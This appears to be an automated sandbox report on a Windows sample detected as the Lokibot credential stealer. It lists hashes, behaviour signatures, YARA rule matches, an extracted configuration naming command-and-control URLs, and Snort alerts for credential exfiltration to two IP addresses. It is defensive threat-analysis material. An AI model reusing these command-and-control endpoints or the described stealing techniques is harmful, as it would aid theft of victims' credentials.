Play interactive tour

Edit tour

Windows Analysis Report aZOmps0Ug8

Overview

General Information

Sample Name:	aZOmps0Ug8 (renamed file extension from none to exe)
Analysis ID:	502657
MD5:	70d177abc7455c709ae9710630b9ea49
SHA1:	4d81e55880a35c0157046560eca20b9f528838f4
SHA256:	b87ecdb8035fa8b5ce87570d757265182a9f49122a02e77dc7f414816cf4b511
Tags:	32exetrojan
Infos:
Most interesting Screenshot:

Detection

Lokibot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Detected unpacking (overwrites its own PE header)

Yara detected Lokibot

Detected unpacking (changes PE section rights)

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Yara detected aPLib compressed binary

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file registry)

Machine Learning detection for sample

Injects a PE file into a foreign processes

C2 URLs / IPs found in malware configuration

Tries to steal Mail credentials (via file access)

Tries to harvest and steal browser information (history, passwords, etc)

Uses 32bit PE files

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Yara detected Credential Stealer

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Enables debug privileges

Sample file is different than original file name gathered from version info

Extensive use of GetProcAddress (often used to hide API calls)

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Creates a process in suspended mode (likely to inject code)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w10x64

aZOmps0Ug8.exe (PID: 6780 cmdline: 'C:\Users\user\Desktop\aZOmps0Ug8.exe' MD5: 70D177ABC7455C709AE9710630B9EA49)

aZOmps0Ug8.exe (PID: 3980 cmdline: 'C:\Users\user\Desktop\aZOmps0Ug8.exe' MD5: 70D177ABC7455C709AE9710630B9EA49)

cleanup

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.php"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.612017929.0000000000658000.00000004.00000020.sdmp	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
00000000.00000002.354804964.000000000F030000.00000004.00000001.sdmp	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x13e78:$s1: http:// 0x17633:$s1: http:// 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0 0x13e80:$s2: https:// 0x13e78:$f1: http:// 0x17633:$f1: http:// 0x13e80:$f2: https://
00000000.00000002.354804964.000000000F030000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.354804964.000000000F030000.00000004.00000001.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.354804964.000000000F030000.00000004.00000001.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.354804964.000000000F030000.00000004.00000001.sdmp	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
00000000.00000002.354804964.000000000F030000.00000004.00000001.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000001.00000001.351943759.0000000000400000.00000040.00020000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000001.351943759.0000000000400000.00000040.00020000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000001.00000001.351943759.0000000000400000.00000040.00020000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000001.00000001.351943759.0000000000400000.00000040.00020000.sdmp	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
00000001.00000001.351943759.0000000000400000.00000040.00020000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
Process Memory Space: aZOmps0Ug8.exe PID: 6780	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: aZOmps0Ug8.exe PID: 6780	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: aZOmps0Ug8.exe PID: 3980	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: aZOmps0Ug8.exe PID: 3980	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
Process Memory Space: aZOmps0Ug8.exe PID: 3980	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Click to see the 17 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.1.aZOmps0Ug8.exe.400000.0.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x13e78:$s1: http:// 0x17633:$s1: http:// 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0 0x13e80:$s2: https:// 0x13e78:$f1: http:// 0x17633:$f1: http:// 0x13e80:$f2: https://
1.1.aZOmps0Ug8.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.1.aZOmps0Ug8.exe.400000.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
1.1.aZOmps0Ug8.exe.400000.0.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
1.1.aZOmps0Ug8.exe.400000.0.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
1.1.aZOmps0Ug8.exe.400000.0.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
1.2.aZOmps0Ug8.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.aZOmps0Ug8.exe.400000.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
1.2.aZOmps0Ug8.exe.400000.0.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
1.2.aZOmps0Ug8.exe.400000.0.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
1.2.aZOmps0Ug8.exe.400000.0.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.aZOmps0Ug8.exe.f030000.1.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x13e78:$s1: http:// 0x17633:$s1: http:// 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0 0x13e80:$s2: https:// 0x13e78:$f1: http:// 0x17633:$f1: http:// 0x13e80:$f2: https://
0.2.aZOmps0Ug8.exe.f030000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.aZOmps0Ug8.exe.f030000.1.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.aZOmps0Ug8.exe.f030000.1.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.aZOmps0Ug8.exe.f030000.1.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0.2.aZOmps0Ug8.exe.f030000.1.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
1.2.aZOmps0Ug8.exe.400000.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.aZOmps0Ug8.exe.400000.0.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
1.2.aZOmps0Ug8.exe.400000.0.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
1.2.aZOmps0Ug8.exe.400000.0.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
1.2.aZOmps0Ug8.exe.400000.0.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.aZOmps0Ug8.exe.f030000.1.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x13278:$s1: http:// 0x16233:$s1: http:// 0x16c74:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0 0x13280:$s2: https:// 0x13278:$f1: http:// 0x16233:$f1: http:// 0x13280:$f2: https://
0.2.aZOmps0Ug8.exe.f030000.1.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.aZOmps0Ug8.exe.f030000.1.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
0.2.aZOmps0Ug8.exe.f030000.1.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
1.1.aZOmps0Ug8.exe.400000.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.1.aZOmps0Ug8.exe.400000.0.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
1.1.aZOmps0Ug8.exe.400000.0.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
1.1.aZOmps0Ug8.exe.400000.0.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
1.1.aZOmps0Ug8.exe.400000.0.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
Click to see the 26 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000000.00000002.354804964.000000000F030000.00000004.00000001.sdmp

Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.php"]}

Multi AV Scanner detection for submitted file

Show sources

Source: aZOmps0Ug8.exe

Virustotal: Detection: 43%

Perma Link

Antivirus detection for URL or domain

Show sources

Source: http://74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.php

Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Show sources

Source: 74f26d34ffff049368a6cff8812f86ee.gq	Virustotal: Detection: 13%			Perma Link
Source: http://74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.php	Virustotal: Detection: 16%			Perma Link

Machine Learning detection for sample

Show sources

Source: aZOmps0Ug8.exe

Joe Sandbox ML: detected

Compliance:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\aZOmps0Ug8.exe

Unpacked PE file: 1.2.aZOmps0Ug8.exe.400000.0.unpack

Source: aZOmps0Ug8.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source:	Binary string: wntdll.pdbUGP source: aZOmps0Ug8.exe, 00000000.00000003.347212605.000000000F200000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: aZOmps0Ug8.exe, 00000000.00000003.347212605.000000000F200000.00000004.00000001.sdmp

Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Code function: 0_2_00405E93 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Code function: 0_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Code function: 0_2_00402671 FindFirstFileA,
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Code function: 1_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.6:49779 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49779 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49779 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.6:49779 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.6:49780 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49780 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49780 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.6:49780 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49781 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49781 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49781 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49781 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49782 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49782 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49782 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49782 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49783 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49783 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49783 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49783 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49784 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49784 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49784 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49784 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49785 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49785 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49785 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49785 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49786 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49786 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49786 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49786 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49787 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49787 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49787 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49787 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49788 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49788 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49788 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49788 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49789 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49789 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49789 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49789 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49790 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49790 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49790 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49790 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49791 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49791 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49791 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49791 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49792 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49792 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49792 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49792 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49793 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49793 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49793 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49793 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49794 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49794 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49794 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49794 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49795 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49795 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49795 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49795 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49798 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49798 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49798 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49798 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49799 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49799 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49799 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49799 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49800 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49800 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49800 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49800 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49801 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49801 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49801 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49801 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49802 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49802 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49802 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49802 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49803 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49803 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49803 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49803 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49804 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49804 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49804 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49804 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49805 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49805 -> 104.21.62.32:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49805 -> 104.21.62.32:80
